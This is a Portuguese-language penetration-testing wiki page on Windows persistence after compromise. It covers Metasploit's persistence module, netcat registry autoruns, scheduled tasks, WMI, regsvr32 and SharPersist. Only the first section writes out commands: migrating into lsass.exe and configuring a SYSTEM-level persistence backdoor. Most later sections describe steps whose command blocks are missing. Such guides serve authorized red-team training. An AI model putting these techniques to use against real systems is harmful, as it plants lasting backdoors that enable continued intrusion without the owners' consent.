Persistência

As vezes podemos perder nossa conexão depois que o host alvo reiniciar ou ficar um tempo sem conexão com a internet. Veremos aqui algumas formas de deixar nossa conexão com a vítima de forma permanente.

Metasploit

Nos exemplo abaixo, estamos utilizando um alvo Windows, no qual já temos uma sessão aberta com o Meterpreter.

Persistence

Antes de prosseguir, utilize o migrate para garantir o acesso.

ps -S lsass.exe
migrate <pid>

Agora, execute os comandos para deixar o acesso de fato persistente.

use exploit/windows/local/persistence
set EXE_NAME win32
set REG_NAME win32
set VBS_NAME win32
set PATH c:\\windows\\system32
set STARTUP SYSTEM
set LPORT <port>
set SESSION <session_id>
exploit

Persistence Registry

Persistence Service

RDP

Depois de pegar o Meterpreter, utilize o comando abaixo para criar um user com acesso RDP.

Netcat

Faça o upload do binário do netcat para o alvo. No Kali podemos encontrá-lo, então vamos realizar o upload utilizando o Meterpreter.

Agora vamos manipular o registro do Windows para fazer com que o netcat realize a conexão conosco assim que o SO for inicializado.

Para conferir se o comando deu certo, execute:

Agora podemos conectar no host remoto através do comando abaixo, mesmo depois de reiniciar o SO.

Schtasks

Para seguir os passos abaixo, é preciso ter acesso ao Meterpreter. Note que estamos utilizando o EventID 4634, pois estamos criando uma tarefa agendada com base no ID do Evento. A identificação do evento é listada nos logs quando uma conta foi desconectada. Portanto, uma vez que um usuário se logue novamente, devemos conseguir uma sessão no Meterpreter.

No host atacante, utilize o exploit/multi/handler para realizar a conexão via Meterpreter.

wmic

Faça upload do arquivo arquivo gerado para o alvo em C:\Users\Administrator\AppData\Local\Temp.

Execute os comandos wmic no SO alvo para criar a persistência.

No host atacante, utilize o exploit/multi/handler para realizar a conexão via Meterpreter.

WMI

Execute o comando abaixo em outro terminal para gerar o backdoor e envie o arquivo gerado para o host alvo.

Feito isso, acesse o diretório onde está o arquivo WMI-Persistence.ps1 e abra uma porta web.

Agora vá para o terminal que está com o Meterpreter aberto (ou utilize o mesmo terminal e acesse o Meterpreter) e execute os seguintes comandos:

O host então, poderá ser reiniciado que irá tentar conectar com o host atacante, realizando assim uma conexão via Meterpreter. No host alvo, utilize o exploit/multi/handler para realizar a conexão via Meterpreter.

Regsvr32

Vá para o outro terminal (que tenha acesso Meterpreter) e execute os seguintes comandos:

Após isso, será realizar uma conexão Meterpreter assim que o host alvo for reiniciado.

SharPersist

Faça upload dos arquivos SharPersist.exe e backdoor.exe para o host alvo no diretório C:\Users\Administrator\AppData\Local\Temp\ e depois execute no Meterpreter:

No host atacante, utilize o exploit/multi/handler para realizar a conexão via Meterpreter.

Sites

Last updated

Was this helpful?